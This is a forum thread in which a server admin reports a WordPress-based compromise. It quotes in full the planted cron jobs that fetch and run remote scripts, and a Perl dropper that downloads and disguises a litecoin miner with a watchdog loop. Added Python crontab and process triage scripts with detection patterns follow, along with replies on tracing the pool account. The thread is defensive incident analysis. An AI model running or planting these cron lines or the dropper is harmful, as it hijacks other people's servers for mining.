GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Tech hacking Assholes (https://gfy.com/showthread.php?t=1142166)

sarettah 06-02-2014 03:23 PM

hacking Assholes
 
So, one of my servers was running at about 400% apparently.

When all was said and done it seems that someone used a WP hack on one of my clients' WP installs and then managed to somehow gain shell access to set up 2 cron jobs, one under each of 2 different user accounts.

The cron job appears to create an instance of a bitcoin mining operation of some kind.

I found it being discussed here: http://serverfault.com/questions/598...-100-cpu-usage

This is one of the crons that was created:

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*
*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*
*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*
10 2 * * * killall -9 /usr/bin/host;cd /tmp;wget http://95.154.227.98/.../libcfg.txt;curl -O http://95.154.227.98/.../libcfg.txt;mv libcfg.txt libcfg.php;php libcfg.php

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt


************************************End of cron

And this is the little perl script that they pull in in the abc.txt file:

#!/usr/bin/perl
# Kill competing miners and earlier copies running under this dropper's own process names.
system("killall -9 minerd");
system("killall -9 PWNEDa");
system("killall -9 PWNEDb");
system("killall -9 PWNEDc");
system("killall -9 PWNEDd");
system("killall -9 PWNEDe");
system("killall -9 PWNEDg");
system("killall -9 PWNEDm");
system("killall -9 minerd64");
system("killall -9 minerd32");
system("killall -9 named");
# Pick a random worker suffix (2..10; 0 and 1 are rejected) and note the CPU architecture.
$rn=1;
$ar=`uname -m`;
while($rn==1 || $rn==0) { $rn=int(rand(11)); }
# Bail out if the miner is already running under one of its disguised names.
$exists=`ls /tmp/.Ice-unix`;
$cratch=`ps aux | grep -v grep | grep kernelcfg`;
$cratchx=`ps aux | grep -v grep | grep kernelupdates`;
if($cratch=~/kernelcfg/gi || $cratchx=~/kernelupdates/gi) { die; }

# If the miner binary is not already unpacked, fetch the build for this
# architecture (via wget or curl, depending on the `wget --version` test) into
# the hidden dir /tmp/.Ice-unix and rename minerd to "kernelcfg" so it passes
# for a system process.
if($exists!~/kernelcfg/gi) {
    $wig=`wget --version | grep GNU`;
    if(length($wig)<6) {
        if($ar=~/64/g) {
            system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;wget http://41.215.22.162/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg");
        } else {
            system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;wget http://41.215.22.162/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg");
        }
    } else {
        if($ar=~/64/g) {
            system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;curl -O http://41.215.22.162/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg");
        } else {
            system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;curl -O http://41.215.22.162/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg");
        }
    }
}

# Candidate pool ports; the port picked here is never actually used below
# (the connection is hard-coded to port 80).
@prts=('8332','9091','1121','7332','6332','1332','9333','2961','8382','8332','9091','1121','7332','6332','1332','9333','2961','8382');
$prt=0;
while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; }
print "setup for $rn:$prt done :-)\n";

# Watchdog: every 5 seconds, restart the miner if it is not running, pointing it
# at the litecoin pool with account "spdrman" and this host's random worker suffix.
while(1) {
    $cratch=`ps aux | grep -v grep | grep kernelcfg`;
    $cratchx=`ps aux | grep -v grep | grep kernelupdates`;
    if($cratch!~/kernelcfg/gi && $cratch!~/kernelupdates/gi) {
        system("cd /tmp/.Ice-unix;./kernelcfg -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &");
    }
    sleep(5);
}

****************************************************

I am getting the idea that it is a bitcoin mining thing only because of some of the variable names in there and the discussion I linked to. I have not examined the code at all yet.

So, how many coins do you think they managed to do off my little server? I am guessing about .00000000001 BC across the week ;p
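A way to triage a crontab dump for entries shaped like the ones above (fetch a script into /tmp, hand it to an interpreter, delete it), as an added example that is not part of the original post. The sample crontab is constructed for the example, with an .invalid hostname and a TEST-NET address standing in for the real download hosts; the scoring rule (download plus interpreter required, temp-dir and cleanup only add confidence) is my own choice.

```python
"""Triage crontab entries for dropper-style jobs.

Added example (not the thread author's code). SAMPLE_CRONTAB is constructed;
its hosts are .invalid / TEST-NET placeholders, not the real ones.
"""
import re

# Constructed sample. The first two rows mimic the shape of the cron lines
# posted in the thread; the last two are ordinary jobs that must not be flagged.
SAMPLE_CRONTAB = """\
*/6 * * * * cd /tmp;wget http://updates.example.invalid/x/abc.txt;curl -O http://updates.example.invalid/x/abc.txt;perl abc.txt;rm -f abc*
10 2 * * * killall -9 /usr/bin/host;cd /tmp;wget http://203.0.113.10/x/libcfg.txt;curl -O http://203.0.113.10/x/libcfg.txt;mv libcfg.txt libcfg.php;php libcfg.php
0 3 * * * /usr/bin/certbot renew --quiet
30 1 * * 0 /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
"""

CRON_LINE = re.compile(r"^\s*(?P<schedule>(?:\S+\s+){5})(?P<command>.+)$")
URL_RE = re.compile(r"https?://[^\s;'\"]+")
DOWNLOADER_RE = re.compile(r"\b(wget|curl|fetch)\b")
# interpreter must start a command (line start or after ; & | or whitespace),
# so "backup.sh" is not mistaken for "sh <file>"
INTERPRETER_RE = re.compile(r"(?:^|[;&|\s])(perl|php|python\d?|sh|bash)\s+\S+")
TMP_DIR_RE = re.compile(r"\bcd\s+/(?:tmp|var/tmp|dev/shm)\b")
CLEANUP_RE = re.compile(r"\brm\s+-r?f\b")


def triage_cron_line(line):
    """Return a finding dict for a suspicious entry, or None.

    An entry is flagged when it downloads something AND hands it to an
    interpreter; working out of a temp dir and deleting the payload afterwards
    raise the score but are not enough on their own.
    """
    if line.lstrip().startswith("#"):
        return None
    m = CRON_LINE.match(line)
    if not m:
        return None
    cmd = m.group("command")
    reasons = []
    if DOWNLOADER_RE.search(cmd):
        reasons.append("downloads a remote file")
    if INTERPRETER_RE.search(cmd):
        reasons.append("runs a script with an interpreter")
    if TMP_DIR_RE.search(cmd):
        reasons.append("works out of a world-writable temp dir")
    if CLEANUP_RE.search(cmd):
        reasons.append("deletes files afterwards (anti-forensics)")
    if ("downloads a remote file" not in reasons
            or "runs a script with an interpreter" not in reasons):
        return None
    urls = sorted(set(URL_RE.findall(cmd)))
    hosts = sorted({re.sub(r"^https?://", "", u).split("/")[0] for u in urls})
    return {
        "schedule": m.group("schedule").strip(),
        "command": cmd,
        "reasons": reasons,
        "urls": urls,      # download URLs to block / pivot on
        "hosts": hosts,    # hosts to look for in proxy and DNS logs
        "score": len(reasons),
    }


def triage_crontab(text):
    """Run triage over every line of a crontab dump; return the findings."""
    findings = []
    for line in text.splitlines():
        f = triage_cron_line(line)
        if f:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in triage_crontab(SAMPLE_CRONTAB):
        print(f"[score {f['score']}] {f['schedule']}  hosts={f['hosts']}")
        for r in f["reasons"]:
            print("   -", r)
```

In practice you would feed it the output of `crontab -l` for each user plus the files under /etc/cron.d, /var/spool/cron and friends, since the dropper in this thread installed entries under two different accounts.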

Nice_Nick 06-02-2014 03:33 PM

Maybe they were doing altcoins?

Or maybe they also attacked every site on the server (if it's shared).

Hate hackers but can't help marvel at what they can do.

dantheman 06-02-2014 03:35 PM

what's up sarettah, long time no chat :winkwink:

sarettah 06-02-2014 03:52 PM

Quote:

Originally Posted by dantheman (Post 20109036)
what's up sarettah, long time no chat :winkwink:

Damn, Danny, yes. Long long time.

See you flying the M3 Button. You back with them? Or never left? Or what?

Edited in: See you have an M3 email address so I guess you are there.

Were you gone? Fill me in man. Expiring minds need to know ;p

And on that note. Just for the record. M3 picked up on the hack for me because of CPU usage. Then we spent most of the afternoon tracking down shit and making sure holes were patched. As always thanks to M3 - Travis, Chris, and Ryan this time - for all the help.


.

dantheman 06-02-2014 04:31 PM

Quote:

Originally Posted by sarettah (Post 20109072)
Damn, Danny, yes. Long long time.

See you flying the M3 Button. You back with them? Or never left? Or what?

Edited in: See you have an M3 email address so I guess you are there.

Were you gone? Fill me in man. Expiring minds need to know ;p

And on that note. Just for the record. M3 picked up on the hack for me because of CPU usage. Then we spent most of the afternoon tracking down shit and making sure holes were patched. As always thanks to M3 - Travis, Chris, and Ryan this time - for all the help.


.

I'm glad they were able to help you. They've been at this forever, no better hosting techs out there!
Do you have ICQ? Add me if so; if not, shoot me an email and I'll fill you in :thumbsup

UniqueD 06-02-2014 04:38 PM

Mining litecoin: you can see it connecting at the end to the litecoin mining pool wemineltc.com, with the worker name "spdrman" plus some extra characters.

6South 06-02-2014 05:00 PM

We get attacked an average of 5-12 times per day across the dozens of servers and hundreds of VPS accounts I admin.

In 5 years, we've had 1 compromise which was due to an inside job by someone at a provider who had access to their admin account passwords.

It's really not that hard to secure systems. You don't have to be completely paranoid because unless someone is specifically targeting you for attack most hacks are based on lazy ass script fags who look for the easy targets.

Ongoing monitoring with alerts via SMS allows you to catch the occasional zero day exploit and stop it before they completely wreck a system.

HostWanted 06-02-2014 05:13 PM

You can find out who this is by going here:

wemineltc.com

Subpoena them for their users' info. They should be following KYC laws (Know Your Customer) if they are compliant. The username for their pool member is spdrman,
and I'm sure by getting this info you will open a can of worms for that user because you will be able to see every server he/she has hacked in the pool account.

The line below configures the username, truncated by a "." to the worker name, and uses any old password because pools typically do not use passwords....

system("cd /tmp/.Ice-unix;./kernelcfg -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &");
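To complement the worker-name observation above and 6South's point about catching runaway CPU with monitoring, here is an added example (not from the thread) that runs over a constructed `ps aux` dump: it parses cpuminer-style `-o/-u/-p` arguments to pull out the pool host, the account and the per-victim worker suffix, flags the disguised binary names used by the script in the first post, and flags any process above a CPU threshold. The pool host and account name are the ones quoted in the thread; the PIDs, users, threshold and other rows are made up for the example.

```python
"""Triage a `ps aux` dump for coin-miner signs.

Added example (not from the thread). SAMPLE_PS is constructed: the pool host
and account come from the thread, everything else is invented.
"""
import re
from urllib.parse import urlsplit

# Constructed `ps aux` output: header row, a miner disguised as "kernelcfg"
# with the thread's stratum arguments, and two benign rows.
SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
www-data  4123  398  1.2 612344 48212 ?        Sl   14:02 512:33 ./kernelcfg -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.7 -p passxxx
root         1  0.0  0.1  33620  4052 ?        Ss   Jan01   0:07 /sbin/init
mysql      901  2.5  6.3 1200000 250012 ?      Ssl  Jan01  98:11 /usr/sbin/mysqld
"""

CPU_ALERT_PERCENT = 90.0   # assumed alerting threshold; tune per host
STRATUM_RE = re.compile(r"stratum\+(?:tcp|ssl|tls)://\S+")
# hidden dot-dirs under /tmp and the two disguise names from the dropper script
DISGUISE_RE = re.compile(r"/tmp/\.\S+|\./kernelcfg\b|\bkernelupdates\b")


def parse_miner_args(cmdline):
    """Pull pool host/port, account and worker out of a cpuminer-style
    command line (-o URL -u account.worker -p password). None if no pool URL."""
    m = STRATUM_RE.search(cmdline)
    if not m:
        return None
    pool = urlsplit(m.group(0))   # urlsplit handles stratum+tcp:// like any scheme
    argv = cmdline.split()

    def opt(flag):
        if flag in argv and argv.index(flag) + 1 < len(argv):
            return argv[argv.index(flag) + 1]
        return None

    account, _, worker = (opt("-u") or "").partition(".")
    return {"pool_host": pool.hostname, "pool_port": pool.port,
            "account": account, "worker": worker, "password": opt("-p")}


def triage_ps(text):
    """Return one finding per suspicious process in a `ps aux` dump."""
    findings = []
    for line in text.splitlines()[1:]:          # skip header
        cols = line.split(None, 10)             # COMMAND keeps its spaces
        if len(cols) < 11:
            continue
        user, pid, cpu, cmd = cols[0], int(cols[1]), float(cols[2]), cols[10]
        reasons = []
        miner = parse_miner_args(cmd)
        if miner:
            reasons.append(f"mines to {miner['pool_host']}:{miner['pool_port']} "
                           f"as account {miner['account']!r} worker {miner['worker']!r}")
        if DISGUISE_RE.search(cmd):
            reasons.append("runs from a hidden temp dir or under a known disguise name")
        if cpu >= CPU_ALERT_PERCENT:
            reasons.append(f"{cpu:.0f}% CPU")
        if reasons:
            findings.append({"pid": pid, "user": user, "cpu": cpu,
                             "miner": miner, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage_ps(SAMPLE_PS):
        print(f"PID {f['pid']} ({f['user']}):")
        for r in f["reasons"]:
            print("   -", r)
```

The account/worker split is what makes the pool pivot described above possible: every infected host reports under the same account with only the random suffix differing, so the pool's per-worker statistics enumerate the victims.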

